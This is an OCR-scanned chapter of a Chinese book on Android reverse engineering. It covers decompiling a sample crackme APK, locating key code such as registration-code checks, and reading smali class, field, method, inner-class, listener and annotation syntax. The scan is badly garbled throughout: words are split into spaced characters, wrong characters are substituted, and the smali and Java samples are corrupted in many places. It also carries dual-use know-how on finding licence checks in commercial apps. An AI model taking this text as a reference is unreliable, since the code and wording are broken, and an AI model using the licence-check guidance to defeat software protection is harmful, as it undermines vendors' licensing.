分 析 、 语 法 分 析 等 各 种 技术 手段 对 程序 文件 进行 扫描 从 而 生成 程序 的 反 
汇编 代码 ， 然 后 阅读 反 汇 编 代码 来 掌握 程序 功能 的 一 种 技术 。 在 实际 的 
分 析 过 程 中 ， 完 全 不 运行 程序 是 不 太 可 能 的 ， 分 析 人 员 时 常 需要 先 运 行 
目标 程序 来 寻找 程序 的 突破 口 。 静 态 分 析 强 调 的 是 静态 ， 在 整个 分 析 的 
过 程 中 ， 阅 读 反 汇编 代码 是 主要 的 分 析 工 作 。 生 成 反 汇 编 代 码 的 工具 称 
为 反 汇 编 工具 或 反 编 译 工 具 ， 选 择 一 个 功能 强大 的 反 汇 编 工 具 不 仅 能 获 
得 更 好 的 反 汇 编 效 果 ， 而 且 也 能 为 分 析 人 员 节 省 不 少时 间 。 

静态 分 析 Android 程 序 有 两 种 方法 : 一 种 方法 是 阅读 反 汇 编 生 成 的 
Dalvik 字 节 码 ， 可 以 使 用 IDA_ Pro 分析 dex 文 件 ， 或 者 使 用 文本 编辑 器 阅 
读 baksmali 反 编译 生成 的 smali 文 件 ， 男 一 种 方法 是 阅读 反 汇 编 生 成 的 
Java 源 码 ， 可 以 使 用 dex2jar 生 成 jar 文 件 ， 然 后 再 使 用 jd-gui 疝 读 jar 文 件 
的 代码 。 






































5.2 ”快速 定位 Android 程 序 的 关键 代码 





在 逆 辣 一 个 Android 软 件 时 ， 如 末 言 目的 分 析 ， 可 能 需要 阅读 成 千 
上 万 行 的 有 反 汇 编 代码 才能 找到 程序 的 关键 点 ， 这 无 疑 是 浪费 时 间 的 表 
现 ， 本 小 节 将 介绍 如 何 快速 的 定位 程序 的 关键 代码 。 





5.2.1 及 编 译 apk 程 序 


每 个 apk 文 件 中 都 包含 有 一 个 AndroidManifest.xml 文 件 ， 它 记录 着 软 
件 的 一 些 基本 信息 。 包 括 软 件 的 包 名 、 运 行 的 系统 版 本 、 用 到 的 组 件 
等 。 并 且 这 个 文件 被 加 密 存 储 进 了 apk 文 件 中 ， 在 开始 分 析 前 ， 有 必要 
先 反 编译 apk 文 件 对 其 进行 解密 。 反 编译 apk 的 工具 使 用 前 面 草 节 介 绍 过 
的 Apktool。Apktool 提 供 了 反 编译 与 打包 apk 文 件 的 功能 。 本 小 节 使 用 到 
的 实例 程序 为 crackme0502.apk， 按 照 前 面 使 用 Apktool 的 步骤 ， 在 命令 
提示 符 下 输入 “apktool d crackme0502.apk” 即 可 反 编 译 成 功 。 








5.2.2 ”程序 的 主 Activity 


我 们 知道 ， 一 个 Android 程 序 由 一 个 或 多 个 Activity 以 及 其 它 组 
成 ， 每 个 Activity 都 是 相同 级 别 的 ， 不 同 的 Activity 实 现 不 同 的 功能 。 
个 Activity 都 是 Android 程 序 的 一 个 显示 “页 面 ”， 主 要 负责 数据 的 ae 
展示 工作 ， 在 Android 程 序 的 开发 过 程 中 ， 程 序 员 很 多 时 候 是 在 编写 用 
户 与 Activity 之 间 的 交互 代码 。 

每 个 Android 程 序 有 且 只 有 一 个 主 Activity《〈 隐 藏 程序 除外 ， 它 没有 
主 Activity) ， 它 是 程序 局 动 的 第 一 个 Activity。 打 开 crackme0502 文 件 夹 
下 的 AndroidManifest.xml 文 件 ， 其 中 有 如 下 卢 断 的 代码 。 














<activity android:label="@string/title activity main" android:name=". MainActivity"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 
<category android:name="android.intent.category .LAUNCHER" /> 
</intent-filter> 
</activity> 


在 程序 中 使 用 到 的 Activity 都 需要 在 AndroidManifest.xml 文 件 中 手动 
声明 ， 声 明 Activity 使 用 activity 标 签 ， 其 中 android:label 指 定 Activity 的 标 
题 ，android:name 指 定 具 体 的 Activity 类 ,，“.MainActivity” 前 面 省 略 了 程 
序 的 包 名 ， 完 整 类 名 应 该 为 com.droider.crackme0502.MainActivity， 
intent-filter 指 定 了 Activity 的 局 动 意图 ，android.intent.action.MAIN 表 示 这 
个 Activity 是 程序 的 主 Activity。android.intent.category.LAUNCHER 表 示 
这 个 Activity 可 以 通过 LAUNCHER 来 启动 。 如 果 AndroidMenifest.xml 
中 ， 所 有 的 Activity 都 没有 添加 android.intent.category.LAUNCHER， 那 
么 该 程序 安装 到 Android 设 备 上 后 ， 在 程序 列表 中 是 不 可 见 的 ， 同 样 
的 ， 如 果 没 有 指定 android.intent.action.MAIN，Android 系 统 的 
LAUNCHER 就 无 法 匹配 程序 的 主 Activity， 因 此 该 程序 也 不 会 有 图 标 出 
现 。 








在 反 编译 出 的 AndroidManifest.xml 中 找到 主 Activity 后 ， 可 以 直接 去 
查看 其 所 在 类 的 OnCreate() 方 法 的 有 反 汇 编 代码 ， 对 于 大 多 数 软件 来 说 ， 
这 里 就 是 程序 的 代码 入 口 处 ， 所 有 的 功能 都 从 这 里 开始 得 到 执行 ， 我 们 
可 以 治 着 这 里 一 直 癌 下 查看 ， 退 踩 软 件 的 执行 流程 。 











5.2.3” 需 重点 关注 的 Application 类 








如 果 需 要 在 程序 的 组 件 之 间 传 递 全 局 变量 ， 或 者 在 Activity 局 动 之 
前 做 一 些 初 始 化 工作 ， 就 可 以 考虑 使 用 Application 类 了 。 使 用 
Application 时 需要 在 程序 中 添加 一 个 类 继承 自 android.app.Application， 
然后 重 写 它 的 OnCreate() 方 法 ， 在 该 方法 中 初始 化 的 全 局 变量 可 以 在 





Android 其 它 组 件 中 访问 ， 当 然 前 提 条 件 是 这 些 变 量具 有 public 属 性 。 最 
后 还 需要 在 AndroidManifest.xml 文 件 的 Application 标 签 中 添 
加 “android:name” 属 性 ， 取 值 为 继承 自 android.app.Application 的 类 名 。 
鉴于 Application 类 比 程序 中 其 它 的 类 局 动 得 都 要 早 ， 一 些 商 业 软 件 
将 授权 验证 的 代码 都 转移 到 了 该 类 中 。 例 如 ， 在 OnCreate0 方 法 中 检测 
软件 的 购买 状态 ， 如 果 状 态 异 常 则 拒绝 程序 继续 运行 。 因 此 ， 在 分 析 
Android 程 序 过 程 中 ， 我 们 需要 先 查 看 该 程序 是 否 具 有 Application 类 ， 如 
果 有 ， 束 要 看 看 它 的 OnCreate() 方 法 中 是 否 做 了 一 些 影响 到 逆 癌 分 析 的 
初始 化 工作 。 


5.2.4 ”如 何 定 位 关键 代码 六 种 方法 


一 个 完整 的 Android 程 序 反 编 译 后 的 代码 量 可 能 非常 庞大 ， 要 想 在 
这 浩如烟海 的 代码 中 找到 程序 的 关键 代码 ， 是 需要 很 多 经 验 与 技巧 的 。 
笔者 经 过 长 时 间 的 探索 ， 总 结 了 以 下 几 种 定位 代码 的 方法 。 

。 信息 反馈 法 

所 谓 信息 反馈 法 ， 是 指 先 运行 目标 程序 ， 然 后 根据 程序 运行 时 给 出 
的 反馈 信息 作为 突破 口 寻找 关键 代码 。 在 第 2 章 中 ， 我 们 运行 目标 程序 
并 输入 错误 的 注册 码 时 ， 会 弹出 提示 “无 效用 户 名 或 注册 码 ”， 这 就 是 程 
序 反馈 给 我 们 的 信息 。 通 常情 况 下 ， 程 序 中 用 到 的 字符 串 会 存储 在 
String xml 文 件 或 者 硬 编码 到 程序 代码 中 ， 如 果 是 前 者 的 话 ， 字 符 串 在 
程序 中 会 以 id 的 形式 访问 ， 只 需 在 反 汇编 代码 中 搜索 字符 串 的 id 值 即 可 
找到 调用 代码 处 ， 如 果 是 后 者 的 话 ， 在 反 汇 编 代 码 中 直接 搜索 字符 串 即 
可 。 


e 特征 函数 法 









































这 种 定位 代码 的 方法 与 信息 反馈 法 类 似 。 在 信息 反馈 法 中 ， 无 论 程 
序 给 出 什么 样 的 反馈 信息 ， 终 究 是 需要 调用 Android SDK 中 提供 的 相关 
API 函 数 来 完成 的 。 比 如 弹出 注册 码 错 误 的 提示 信息 惑 需 要 调用 
Toast.MakeText().Show() 方 法 ， 在 反 汇 编 代码 中 直接 搜索 Toast 应 该 很 快 
就 能 定位 到 调用 代码 ， 如 果 Toast 在 程序 中 有 多 处 的 话 ， 可 能 需要 分 析 
人 员 逐 个 甄别 。 

e 顺序 查看 法 

顺序 查看 法 是 指 从 软件 的 启动 代码 开始 ， 逐 行 的 同 下 分 析 ， 掌 握 软 
件 的 执行 流程 ， 这 种 分 析 方 法 在 病毒 分 析 时 经 常用 到 。 

e 代码 注入 法 

代码 注入 法 属于 动态 调试 方法 ， 它 的 原理 是 手动 修改 apk 文 件 的 反 
汇编 代码 ， 加 入 Log 输 出 ， 配 合 LogCat 查 看 程序 执行 到 特定 点 时 的 状态 
数据 。 这 种 方法 在 解密 程序 数据 时 经 党 使 用 ， 详 细 的 内 容 会 在 本 书 的 第 
8 章 介 绍 。 

e。 栈 跟踪 法 

栈 跟踪 法 属于 动态 调试 方法 ， 它 的 原理 是 输出 运行 时 的 栈 跟 踪 信 
恩 ， 然 后 查看 栈 上 的 函数 调用 序列 来 理解 方法 的 执行 流程 ， 这 种 方法 的 
详细 内 容 会 在 本 书 的 第 8 章 介绍 。 

e Method Profiling 


Method Profiling《〈 方 法 谢 析 ) 属于 动态 调试 方法 ， 它 主要 用 于 热点 
分 析 和 性 能 优化 。 该 功能 除了 可 以 记录 每 个 函数 占用 的 CPU 时 间 外 ， 还 
能 够 跟 踊 所 有 的 函数 调用 关系 ， 并 提供 比 栈 跟踪 法 更 详细 的 函数 调用 序 
列 报告 ， 这 种 方法 在 实践 中 可 帮助 分 析 人 员 节 省 很 多 时 间 ， 也 被 广泛 使 
用 ， 详 细 的 内 容 会 在 本 书 的 第 8 半 介 绍 。 



































5.3 ”smali 多 件 格 式 








使 用 Apktool 反 编译 apk 文 件 后， 会 在 反 编译 工程 目录 下 生成 一 个 
smali 文 件 夹 ， 里 面 存放 着 所 有 有 反 编 译 出 的 smali 文 件 ， 这 些 文件 会 根据 
程序 包 的 层次 结构 生成 相应 的 目录 ， 程 序 中 所 有 的 类 都 会 在 相应 的 目录 
下 生成 独立 的 smali 文 件 。 如 上 一 节 中 程序 的 主 Activity 名 为 
com.droider.crackme0502.MainActivity， 就 会 在 smali 目 录 下 依次 生成 
comxdroidermcrackme0502 目 录 结 构 ， 然 后 在 这 个 目录 下 生成 
MainActivity.smali 文 件 。 

smali 文 件 的 代码 通常 情况 下 比较 长 ， 而 且 指 令 繁 多 ， 在 阅读 时 很 难 
用 肉眼 捕捉 到 重点 ， 如 果 有 阅读 工具 能 够 将 特殊 指令 (例如 条 件 跳 转 指 
令 ) 高 亮 显示 ， 势 必 会 让 分 析 工 作 事半功倍 ， 为 此 笔者 专门 为 文本 编辑 
器 Notepad++ 编 写 了 smali 语 法 文件 来 文 持 高 之 显示 与 代码 折 闭 ， 并 以 此 
作为 smali 代 码 的 阅读 工具 。 

无 论 是 普通 类 、 抽 象 类 、 接 口 类 或 者 内 部 类 ， 在 反 编 译 出 的 代码 
中 ， 它 们 都 以 单独 的 smali 文 件 来 存放 。 每 个 smali 文 件 都 由 奋 干 条 语句 
组 成 ， 所 有 的 语句 都 遵循 着 一 套 语 法 规范 。 在 smali 文 件 的 头 3 行 描述 了 
当前 类 的 一 些 信息 ， 格 式 如 下 。 

.Class < 访问 权限 > [修饰 关键 字 ] < 类 名 > 

.SUper < 父 类 名 > 

.Source < 源 文件 名 > 


打开 MainActivity.smali 文 件 ， 头 3 行 代 码 如 下 。 
.Class public Lcom/droider/crackme0502/MainActivity; 























.Super Landroid/app/Activity; 


.Source "MainActivity.JjJava" 


第 1 行 “.class” 指 令 指 定 了 当前 类 的 类 名 。 在 本 例 中 ， 类 的 访问 权限 








为 public， 类 名 为 “Lcom/droider/crackme0502/MainActivity;”， 类 名 开头 
的 L 是 遵循 Dalvik 字 市 码 的 相关 约定 ， 表 示 后 面 跟随 的 字符 串 为 一 个 


类 。 


第 2 行 的 “.super” 指 令 指 定 了 当前 类 的 父 类 。 本 例 中 
的 “Lcom/droider/crackme0502/MainActivity;” 的 父 类 
为 “Landroid/app/Activity;”。 

第 3 行 的 “.source” 指 令 指 定 了 当前 类 的 源 文 件 名 。 

回想 一 下 ， 在 上 一 间 中 讲解 dex 文 件 格 式 时 介绍 的 DexClassDef 结 
构 ， 这 个 结构 描述 了 一 个 类 的 详细 信息 ， 该 结构 的 第 1 个 字段 classIdx 束 
是 类 的 类 型 索引 ， 第 3 个 字段 superclassIdx 就 是 指向 类 的 父 类 类 型 索引 ， 
第 5 个 字段 SourceFileIdx 惑 是 指向 类 的 源 文 件 名 的 字符 串 索 引 。baksmali 
在 解析 dex 文 件 时 ， 也 是 通过 这 3 个 字段 来 获取 相应 的 类 的 值 。 






































经 过 混淆 的 dex 文 件 ， 反 编译 出 来 的 smali 代 码 可 能 没有 源 文 件 信息 ， 因 此 , “.source” 行 的 代 














前 3 行 代码 过 后 就 是 类 的 主体 部 分 了 ， 一 个 类 可 以 由 多 个 字段 或 方 
法 组 成 。smali 文 件 中 字段 的 声明 使 用 “.field" 指 令 。 字 段 有 静态 字段 与 实 
例 字 段 两 种 。 静 态 字段 的 声明 格式 如 下 。 

# static fields 

.field < 访问 权限 > static [修饰 关键 字 ] < 字段 名 >:< 字 段 类 型 > 

baksmali 在 生成 smali 文 件 时 ， 会 在 静态 字段 声明 的 起 始 处 添 
加 “static ”fields” 注 释 ，smali 文 件 中 的 注释 与 Dalvik 语 法 一 样 ， 也 是 以 井 
号 “#" 开 头 。“.field” 指 令 后 面 跟着 的 是 访问 权限 ， 可 以 是 public、 
Private、Protected 之 一 。 修 饰 关 键 字 描述 了 字段 的 其 它 属 性 ， 如 
synthetic。 指 令 的 最 后 是 字段 名 与 字段 类 型 ， 使 用 冒号 “: 分隔， 语法 





























上 与 Dalvik 也 是 一 样 的 。 

实例 字段 的 声明 与 静态 字段 类 似 ， 只 是 少 了 static 关 键 字 ， 它 的 格式 
如 下 

# instance fields 

.field < 访问 权限 > [修饰 关键 字 ] < 字段 名 >:< 字 段 类 型 > 

比如 以 下 的 实例 字段 声明 。 


# _ instance fields 














.field private btnAnno:Landroid/widget/Button; 

第 1 行 的 “instance ”fields” 是 baksmali 生 成 的 注释 ， 第 2 行 表 示 一 个 私 
有 字段 bmhAnno， 它 的 类 型 为 “Landroid/widget/Button;”。 

如 有 果 一 个 类 中 含有 方法 ， 那 么 类 中 必然 会 有 相关 方法 的 反 汇 编 代 
人 码 ，smali 文 件 中 方法 的 声明 使 用 “.method” 指 令 。 方 法 有 直接 方法 与 虚 
方法 两 种 。 直 接 方法 的 声明 格式 如 下 。 


# direct methods 
.method < 访 庙 太 /E> [ 修 久光 键 祁 ] < 广泛 夺 帮 


<,.[locals> 








[.parameter] 
[prologue] 
[linel 
<f/(C13fR> 
.end method 
“direct ”methods” 是 baksmali 瀛 加 的 注释 ， 访 问 权 限 和 修饰 关键 字 与 
字段 的 描述 相同 ， 方 法 原型 描述 了 方法 的 名 称 、 参 数 与 返回 
值 。“.locals” 指 定 了 使 用 的 局 部 变量 的 个 数 。“.parameter” 指 定 了 方法 的 
与 Dalvik 语 法 中 使 用 “.parameters” 指 定 参 数 个 数 不 同 ， 
个 “.parameter” 指 令 表 明 使 用 一 个 参数 ， 比 如 方法 中 有 使 用 到 3 个 参数 ， 
和 就 会 出 现 3 条 “.parameter” 指 令 。“.prologue” 指 定 了 代码 的 开始 处 


混 消 过 的 代码 可 能 去 掉 了 该 指令 。“.line” 指 定 了 该 处 指令 在 源 代 码 中 的 
行 号 ， 同 样 的 ， 混 消 过 的 代码 可 能 去 除了 行 号 信息 。 

虚 方法 的 声明 与 直接 方法 相同 ， 只 是 起 始 处 的 注释 为 “virtual 
methods”。 

如 果 一 个 类 实现 了 接口 ， 会 在 smali 文 件 中 使 用 “.implements” 指 令 指 
出 。 相 应 的 格式 声明 如 下 。 

# interfaces 

.implements < 接口 名 > 

“# interfaces” 是 baksmali 添 加 的 接口 注释 ，“.implements” 是 接口 关键 
字 ， 后 面 的 接口 名 是 DexClassDef 结 构 中 interfacesOff 字 段 指 定 的 内 容 。 

如 果 一 个 类 使 用 了 注解 ， 会 在 smali 文 件 中 使 用 “.annotation” 指 令 指 
出 。 注 解 的 格式 声明 如 下 。 

# annotations 

.annotation /主角 导 旋 ) < 并 衣 关 和 > 

/池州 子 氏 = 入 

.end annotation 

注解 的 作用 范围 可 以 是 类 、 方 法 或 字段 。 如 果 注 解 的 作用 范围 是 
类 , “.annotation” 指 令 会 直接 定义 在 smali 文 件 中 ， 如 果 是 方法 或 字 
段 ，“.annotation” 指 令 则 会 包含 在 方法 或 字段 定义 中 。 例 如 下 面 的 代 


-> 








# instance fields 
.field public sayWhat:Ljava/lang/String; 
.annotation runtime Lcom/droider/anno/MyAnnoFrField,; 
info = "Hello my friend" 
.end annotation 
.end field 
实例 字段 saayWhat 为 String 类 型 ， 它 使 用 了 
com.droider.anno.MyAnnoField 注 解 ， 注 解 字 段 info 值 为 “Hello my 


friend”。 将 其 转换 为 Java 代 码 为 : 


@ com.droider.anno MyAnnoField(info = "Hello my friend") 
public String sayWhat; 


5.4 Android 程序 中 的 类 


介绍 完了 smali 文 件 格式 ， 下 面 我 们 来 看 看 Android 程 序 反 汇编 后 生 
成 了 哪些 smali 文 件 ， 这 些 smali 文 件 的 代码 又 有 些 什么 特点 。 


5.4.1 ”内 部 类 


Java 语 言 允 许 在 一 个 类 的 内 部 定义 另 一 个 类 ， 这 种 在 类 中 定义 的 类 
被 称 为 内 部 类 (Inner Class) 。 内 部 类 可 分 为 成 员 内 部 类 、 静 态 肉 套 
类 、 方 法 内 部 类 、 匿 名 内 部 类 。 前 面 我 们 曾经 说 过 ，baksmali 在 反 编译 
dex 文 件 的 时 候 ， 会 为 每 个 类 单独 生成 了 一 个 smali 文 件 ， 内 部 类 作为 一 
个 独立 的 类 ， 它 也 拥有 自己 独立 的 smali 文 件 ， 只 是 内 部 类 的 文件 名 形式 
为 “[ 外 部 类 ]$[ 内 部 类 ].smali”， 例 如 下 面 的 类 。 


class Outer { 








class Innert{} 
} 
baksmali 反 编译 上 述 代码 后 会 生成 两 个 文件 : Outer.smali 与 
Outer$Inner.smali。 查 看 5.2 节 生成 的 smali 文 件 ， 发 现在 
smali\com\droider\crackme0502 目 录 下 有 一 个 MainActivity$ 
SNChecker.smali 文 件 ， 这 个 SNChecker 就 是 MainActivity 的 一 个 内 部 类 。 
打开 这 个 文件 ， 代 码 结 构 如 下 。 


.Class public Lcom/droider/crackme0502/MainActivitys$sSNChecker; 
.Super Ljava/lang/Object; 


.Source "MainActivity.java" 


# annotations 

.annotation system Ldalvik/annotation/EnclosingClass; 
Value = Lcom/droider/crackme0502/MainActivity; 

.end annotation 

.annotation System Ldalvik/annotation/InnerClass; 
accessFlags = 0X1 
name = "SNChecker" 


.end annotation 


# instance fields 
.field private sn:Ljava/lang/SsString; 
.field final Synthetic this$0:Lcom/droider/crackme0502/Mainactivity; 


# direct methods 
.method public constructor 
<init>(Lcom/droider/crackme0502/MainActivity;Ljava/lang/string;)V 


.end method 


# virtual methods 
.method public isRegistered()z 


nensss 


.end method 


发 现 它 有 两 个 注解 定义 


块 “Ldalvik/annotation/EnclosingClass;” 与 “Ldalvik/annotation/InnerClass;” 
、 两 个 实例 字段 sn 与 this$0、 一 个 直接 方法 init0、 一 个 虚 方法 
isRegistered()。 注 解 定 义 块 我 们 稍 后 进行 讲解 。 先 看 它 的 实例 字段 ，sn 
是 字符 串 类 型 ，this$0 是 MainActivity 类 型 ，synthetic 关 键 字 表明 它 是 “ 合 
成 ”的 ， 那 this$0 到 底 是 个 什么 东西 呢 ? 





其 实 this$0 是 内 部 类 目 动 保留 的 一 个 指 回 所 在 外 部 类 的 引用 。 左 边 


的 this 表 示 为 父 类 的 引用 ， 右 边 的 数值 0 表示 引用 的 层 数 。 我 们 看 下 面 的 


public class Outer { //thiss$0 
public class FirstInner { :tas 
public class SecondInner { //thiss$2 


public class ThirdIinner { 


} 

每 往 里 一 层 右边 的 数值 就 加 一 ， 如 ThirdInner 类 访问 FirstInner 类 的 
引用 为 this$1。 在 生成 的 反 汇 编 代码 中 ，this$X 型 字段 都 被 指定 了 
synthetic 属 性 ， 表 明 它 们 是 被 编译 器 合成 的 、 虚 构 的 ， 代 码 的 作者 并 没 
有 声明 该 字段 。 

我 们 再 看 看 MainActivity$SNChecker 的 构造 函数 ， 看 它 是 如 何 初 始 
化 的 。 代 码 如 下 。 


# direct methods 





.method public constructor 

<init> (Lcom/droider/crackme0502/MainActivity;Ljava/lang/Sstring;)})Vv 
.locals 0 
.parameter # 第 一 个 参数 Mainactivity 引 用 


.parameter "sn" # 第 二 个 参数 字符 串 sn 


.prologue 

.line 83 

iput-object pl, p0, Leom/droider/crackme0502/MainActivity$SNChecker; 
->this$0:Lcom/droider/crackme0502/MainActivity; # 将 Mainactivitvy 引 用 
赋值 给 thiss0 

invoke-direct {p0}， Ljava/lang/Object;-><init>()Vv # 调 用 冉 认 的 构造 函数 

.line 84 

iput-object p2, pO0, Lcom/droider/crackme0502/MainActivity$SNChecker;-> 

sn:Ljava/lang/sString; 

# 将 sn 字符 串 的 值 赋 给 sn 字段 

.line 85 

return-void 

.end method 


细心 的 读者 会 发 现 ， 这 段 代 码 声 明 时 使 用 “.parameter” 指 令 指 定 了 两 
个 参数 ， 而 实际 上 却 使 用 了 p0 一 p2 共 3 个 寄存 器 ， 为 什么 会 出 现 这 种 情 


况 呢 ? 在 第 3 章 介 绍 Dalvik 虚 拟 机 时 曾经 讲 过 ， 对 于 一 个 非 静 态 的 方法 
而 言 ， 会 隐 仿 的 使 用 p0 寄 存 器 当 作 类 的 this 引 用 。 因 此 ， 这 里 的 确 是 使 
用 了 3 个 寄存 器 : p0 表 示 MainActivity$SNChecker 自 身 的 引用 ，p1 表 示 
MainActivity 的 引用 ，p2 表 示 sn 字 符 串 。 男 外 ， 从 
MainActivity$SNChecker 的 构造 函数 可 以 看 出 ， 内 部 类 的 初始 化 共有 以 
下 3 个 步骤 : 首先 是 保存 外 部 类 的 引用 到 本 类 的 一 个 Synthetic 字段 中 ， 以 
便 内 部 类 的 其 它 方法 使 用 ， 然 后 是 调用 内 部 类 的 父 类 的 构造 函数 来 初始 
化 父 类 ， 最 后 是 对 内 部 类 自 喘 进行 初始 化 。 


5.4.2 ”监听 器 














Android 程 序 开发 中 大 量 使 用 到 了 监听 器 ， 如 Button 的 点 击 事件 啊 应 
OnClickListener、Button 的 长 按 事 件 啊 应 OnLongClickListener、ListView 
列表 项 的 点 击 事件 啊 应 OnItemSelectedListener 等 。 由 于 监 昕 器 只 是 临时 
使 用 一 次 ， 没 有 什么 复 用 价值 ， 因 此 ， 在 实际 编写 代码 的 过 程 中 ， 多 采 
用 匿名 内 部 类 的 形式 来 实现 。 如 下 面 的 按钮 点 击 事件 响应 代码 。 


btn.setOonClickListener (new android.view.View.OnClickListener() { 


@Override 


public void onClick(View v) { 





}); 

监听 器 的 实质 就 是 接口 ， 在 Android 系 统 源码 的 
frameworks\base\coreMjavavandroid\viewAView.java 文 件 中 可 以 发 现 
OnClickListener 监 昕 器 的 代码 如 下 。 


public interface OnClickListener { 


/** 


* Called when a view has been clicked. 
类 

* @Qparam Vv The view that was clicked. 
* 


void onClick (View v): 


} 

设置 按钮 点 击 事件 的 监听 器 只 需要 实现 View.OnClickListener 的 
onClick(0) 方 法 即 可 。 打 开 5.2 节 的 MainActivity.smali 文 件 ， 在 OnCreate0) 
方法 中 找到 设置 按钮 点 击 事件 监听 器 的 代码 如 下 。 


.method public onCreate(Landroid/os/Bundle;)V 

“Loualesy 2 

.parameter "savedInstanceState" 

.line 32 

iget-object vO, p0, Lcom/droider/crackme0502/MainActivity;->btnAnno: 

Landroid/widget/Button; 

new-instance vl, Lecom/droider/crackme0502/MainaActivity$1; # 新 建 一 个 

MainActivity$1 实 例 

invoke-direct {v1l, p0}, Leom/droider/crackme0502/MainActivitys$1; 
-><init> (Lcom/droider/crackme0502/MainActivity;)V # 初 始 化 MainActivity$1 
实例 

invoke-virtual {v0O, v1}, Landroid/widget/Button; 
->setOnClickListener (Landroid/view/View$OnClickListener;)V # 设 置 按钮 
点 击 事件 监听 器 

.line 40 

iget-object vO, p0, Leom/droider/crackme0502/MainActivity; 
->btnCheckSN:Landroid/widget/Button; 

new-instance vl, Lcom/droider/crackme0502/MainActivity$2; # 新 建 一 个 

MainActivity$2 实 例 

invoke-direct {vl, p0}, Lcom/droider/crackme0502/MainActivitys$2 
-><init> (Lcom/droider/crackme0502/MainActivity;)V; # 初 始 化 MainActivity$2 
实例 

invoke-virtual {v0O, v1l}, Landroid/widget/Button; 
->setOonClickListener (Landroid/view/View$OnClickListener;)vV# 设 置 按 钮 
点 击 事件 监听 器 

.line 50 

return-void 

.end method 


OnCreate() 方 法 分 别 了 调用 按钮 对 象 的 setOnClickListener() 方 法 来 设 
置 点 击 事件 的 监听 器 。 第 一 个 按钮 传 入 了 一 个 MainActivity$1 对 象 的 引 
用 ， 第 二 个 按钮 传 入 了 一 个 MainActivity$2 对 象 的 引用 ， 我 们 到 
MainActivity$1.smali 文 件 中 看 一 下 前 者 的 实现 ， 它 的 代码 大 致 如 下 。 


.Class Lcom/droider/crackme0502/MainActivitys$1; 
.Super Ljava/lang/Object; 


.Source "MainActivity.java" 


# interfaces 


.implements Landroid/view/Views$sOnClickListener; 


# annotations 
.annotation system Ldalvik/annotation/EnclosingMethod; 
value = Lcom/droider/crackme0502/MainActivity;->onCreate(Landroid/os/ 
Bundle;)V 
.end annotation 
.annotation system Ldalvik/annotation/InnerClass; 
accessFlags = 0x0 
name = null 


.end annotation 


# instance fields 
.field final synthetic this$0:Lcom/droider/crackme0502/MainActivity; 


# direct methods 
.method constructor <init>(Lcom/droider/crackme0502/MainActivity;)V 


.end method 


# virtual methods 


.method public onClick (Landroid/view/View;)V 


.end method 


在 MainActivity$1.smali 文 件 的 开头 使 用 了 “.implements” 指 令 指 定 该 
类 实现 了 按钮 点 击 事件 的 监听 器 接口 ， 因 此 ， 这 个 类 实现 了 它 的 
OnClick0) 方 法 ， 这 也 是 我 们 在 分 析 程 序 时 关心 的 地 方 。 另 外 ， 程 序 中 的 
注解 与 监听 器 的 构造 函数 都 是 编译 器 为 我 们 自己 生成 的 ， 实 际 分 析 过 程 
中 不 必 关 心 。 


5.4.3 ”注解 类 





注解 是 Java 的 语言 特性 ， 在 Android 的 开发 过 程 中 也 得 到 了 广泛 的 使 


用 。Android 系 统 中 涉及 到 注解 的 包 共 有 两 个 : 一 个 是 
dalvik.annotation， 该 程序 包 下 的 注解 不 对 外 开放 ， 仅 供 核 心 库 与 代码 测 
试 使 用 ， 所 有 的 注解 声明 位 于 Android 系 统 源码 的 
libcore\dalvik\src\main\java\dalvik\annotation 目 录 下 ; 男 一 个 是 
android.annotation， 相 应 注解 声明 位 于 Android 系 统 源码 的 
frameworks\base\core\java\android\annotation 目 录 下 。 在 前 面 介绍 的 smali 
文件 中 ， 可 以 发 现 很 多 代码 都 使 用 到 了 注解 类 ， 首 先是 
MainActivity.smali 文 件 ， 其 中 有 一 段 代 码 如 下 。 
# annotations 
.annotation system Ldalvik/annotation/MemberClasses,; 
value = { 
Lecom/droider/crackme0502/MainActivitys$sSNChecker; 
} 


.end annotation 


MemberClasses 注 解 是 编译 时 自动 加 上 的 ， 查 看 MemberClasses 注 解 
的 源码 ， 代 人 码 如 下 。 
/ 武汉 
* A "System annotation" used to provide the MemberClasses list. 
ey 
@Retention(RetentionPolicy .RUNTIME) 
@Target (ElementType.ANNOTATION_TYPE) 


@interface MemberClasses {} 

从 注释 可 以 看 出 ，MemberClasses 注 解 是 一 个 “系统 注解 >， 作 用 是 
为 父 类 提供 一 个 MemberClasses 列 表 。MemberClasses 即 子 类 成 员 集合 ， 
通俗 的 讲 就 是 一 个 内 部 类 列表 。 

接着 是 MainActivity$1.smali 文 件 ， 其 中 有 一 段 代码 如 下 。 


# annotations 

.annotation System Ldalvik/annotation/EnclosingMethod; 
value = Lcom/droider/crackme0502/MainActivity;->onCreate (Landroid/os/ 
Bundle;)V 


.end annotation 


EnclosingMethod 注 解 用 来 说 明 整 个 MainActivity$1 类 的 作用 范围 ， 


其 中 的 Method 表 明 它 作用 于 一 个 方法 ， 而 注解 的 value 表 明 它 位 于 
MainActivity 的 onCreate() 方 法 中 。 与 EnclosingMethod 对 应 的 还 有 
EnclosingClass 注 解 ， 在 MainActivity$SNChecker.smali 文 件 中 有 如 下 一 段 
代码 。 
# annotations 
.annotation system Ldalvik/annotation/EnclosingClass; 
value = Lcom/droider/crackme0502/MainActivity; 


.end annotation 


.annotation System Ldalvik/annotation/InnerClass; 
accessFlags = 0X1 
name = "SNChecker" 
.end annotation 
EnclosingClass 注 解 表明 MainActivity$SNChecker 作 用 于 一 个 类 ， 注 
解 的 value 表 明 这 个 类 是 MainActivity。 在 EnclosingClass 注 解 的 下 面 是 
InnerClass， 它 表明 自身 是 一 个 内 部 类 ， 其 中 的 accessFlags 访 问 标志 是 一 
个 枚 举 值 ， 声 明 如 下 。 








enum { 
kDexVisibilityBuild = 和 区 OO. /* annotation visibility */ 
kDexVisibilityRuntime = OROE: 
kDexVisibilitySystem = ‘Ox02, 





}; 

为 1 表明 它 的 属性 是 Runtime。name 为 内 部 类 的 名 称 ， 本 例 为 
SNChecker。 

如 有 果 注 解 类 在 声明 时 提供 了 默认 值 ， 那 么 程序 中 会 使 用 到 
AnnotationDefault 注 解 。 打 开 5.2 小 节 smali\com\droiden\anno 日 录 下 的 
MyAnnoClass.smali 文 件 ， 有 如 下 一 段 代 码 。 


# annotations 
.annotation system Ldalvik/annotation/AnnotationDefault; 
value = .subannotation Lcom/droider/anno/MyAnnoClass; 
Value = "MyAnnoClass" 
.end subannotation 


.end annotation 


可 以 看 到 ， 此 处 的 MyAnnoClass 类 有 一 个 默认 值 
为 “MyAnnoClass”。 

